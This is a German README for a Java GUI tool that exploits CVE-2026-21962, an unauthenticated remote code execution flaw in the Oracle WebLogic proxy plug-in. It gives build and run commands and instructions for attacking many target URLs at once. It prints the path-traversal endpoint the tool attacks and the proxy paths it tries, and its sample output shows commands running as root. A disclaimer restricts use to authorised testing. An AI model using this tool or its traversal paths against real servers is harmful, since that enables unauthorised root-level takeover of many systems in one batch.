
Java-GUI-Tool zur Ausnutzung von CVE-2026-21962, einer nicht authentifizierten RCE im Oracle WebLogic Proxy Plug-In, das die Ausführung von Befehlen auf mehreren Zielen über HTTP ermöglicht.
Java-GUI-Version des Exploit-Tools für die Oracle WebLogic Server Proxy Plug-In RCE (Remote Code Execution) Schwachstelle.
java-version/
├── pom.xml # Maven-Projektkonfigurationsdatei
├── README.md # Projektdokumentation
├── run.bat # Windows-Startskript
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Programmeinstiegspunkt
├── core/
│ └── Exploit.java # Kernlogik des Exploits
├── gui/
│ └── MainWindow.java # Hauptfenster der GUI
└── util/
└── HttpClient.java # HTTP-Anfragewerkzeug
Das Programmfenster enthält die folgenden Bereiche:
Eingabeparameter-Bereich (oben)
Schaltflächen-Bereich (Mitte)
Ausführungsprotokoll-Bereich (unten links)
Befehlsausgabe-Bereich (unten rechts)
cd java-version
mvn clean compile
mvn clean package
Die gepackte JAR-Datei befindet sich unter: target/cve-2026-21962-1.0.0.jar
Doppelklicken Sie auf die Datei run.bat, um das Programm zu starten
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[Pfad zu Abhängigkeits-JARs]" com.ashwesker.cve202621962.Main
Ziel-URL:
http://192.168.1.100:7001
Auszuführender Befehl:
whoami
Ziel-URL:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Auszuführender Befehl:
id
Beispiel für die Ausgabe:
[*] Starte Schwachstellentest...
[*] Ziel-URL: http://192.168.1.100:7001
[*] Auszuführender Befehl: id
[*] Testpfad: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Erfolg! Statuscode: 200
[+] Befehlsausführung erfolgreich!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Starte Schwachstellentest...
[*] Ziel-URL: http://192.168.1.101:7001
[*] Auszuführender Befehl: id
[*] Testpfad: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Erfolg! Statuscode: 200
[+] Befehlsausführung erfolgreich!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
Geben Sie nach dem Programmstart die Zielserveradresse in das Textfeld „Ziel-URL" ein
http://target:7001 oder https://oracle-server:4443Geben Sie den auszuführenden Befehl in das Feld „Befehl ausführen" ein
whoami, id, powershell -c ... usw.Klicken Sie auf die Schaltfläche „Exploit ausführen", um den Test zu starten
Sehen Sie sich unten das „Ausführungsprotokoll" an, um den Testablauf zu verfolgen
Sehen Sie sich unten die „Befehlsausgabe" an, um das Ergebnis der Befehlsausführung zu erhalten
Geben Sie mehrere Zieladressen in das Textfeld „Ziel-URL" ein, eine pro Zeile
http://target1:7001
http://target2:7001
https://target3:4443
Geben Sie den auszuführenden Befehl in das Feld „Befehl ausführen" ein
Klicken Sie auf die Schaltfläche „Exploit ausführen", um den Batchtest zu starten
Das Programm testet jedes Ziel nacheinander; die Ausgaben verschiedener Ziele werden mit ================ (80 Gleichheitszeichen) getrennt
Sehen Sie sich unten das „Ausführungsprotokoll" an, um den Testablauf für jedes Ziel zu verfolgen
Sehen Sie sich unten die „Befehlsausgabe" an, um die Befehlsausführungsergebnisse aller Ziele zu erhalten
Das Programm testet automatisch die folgenden Pfade:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Warnung: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests bestimmt. Die unbefugte Verwendung dieses Tools zum Angriff auf Systeme ist illegal.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Dieses Projekt dient ausschließlich Bildungs- und Sicherheitsforschungszwecken.